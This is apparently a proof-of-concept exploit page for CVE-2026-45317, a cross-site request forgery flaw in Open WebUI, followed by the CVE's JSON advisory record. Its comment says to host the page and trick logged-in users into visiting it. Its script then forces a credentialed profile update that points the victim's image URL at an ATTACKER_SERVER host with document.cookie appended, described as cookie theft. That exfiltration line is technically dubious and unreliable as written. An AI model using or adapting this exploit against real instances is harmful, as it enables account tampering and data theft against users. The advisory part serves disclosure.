CVE-2026-45317

<!-- PoC for CVE-2026-45317: Open WebUI CSRF Vulnerability Description: This HTML snippet demonstrates how an attacker could craft a malicious page to update a victim's profile image to a URL controlled by the attacker. Usage: Host this file and trick an authenticated Open WebUI user into visiting it. --> <html> <body> <h2>CSRF PoC for Open WebUI</h2> <p>Attempting to update profile image via CSRF...</p> <script> // Target URL of the vulnerable Open WebUI instance const targetHost = "http://TARGET_OPENWEBUI_HOST"; const apiUrl = `${targetHost}/api/v1/user/update`; // Malicious payload: setting the image URL to an attacker-controlled endpoint // This endpoint logs the request, potentially stealing cookies or causing DoS. const maliciousImageUrl = "http://ATTACKER_SERVER/steal.jpg?data="; // The payload structure depends on the actual API implementation of Open WebUI const payload = { "profile_image_url": maliciousImageUrl + document.cookie // Example: Exfiltrating cookie via URL param }; fetch(apiUrl, { method: 'POST', headers: { 'Content-Type': 'application/json' }, credentials: 'include', // Crucial: Sends the victim's cookies with the request body: JSON.stringify(payload) }) .then(response => { if (response.ok) { console.log("CSRF Attack Successful: Profile image updated."); document.body.innerHTML += "<p>Attack Successful! Check console.</p>"; } else { console.log("CSRF Attack Failed."); } }) .catch(error => { console.error("Error:", error); }); </script> </body> </html>

{"cve": {"id": "CVE-2026-45317", "sourceIdentifier": "[email protected]", "published": "2026-05-15T22:16:54.520", "lastModified": "2026-05-15T22:16:54.520", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, an application-wide Cross-Site Request Forgery (CSRF) vulnerability was found Open-WebUl's image uploading functionality. An attacker can set an image URL to a malicious endpoint, allowing them to perform actions on behalf of a victim user. Any authenticated user can exploit this vulnerability, and any user who views the compromised image (e.g., a profile picture) will unknowingly send a GET request to the attacker-controlled URL. This can lead to cookie theft, denial of service (DoS), or other malicious actions. This vulnerability is fixed in 0.9.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-j6w6-986j-2m2m", "source": "[email protected]"}]}}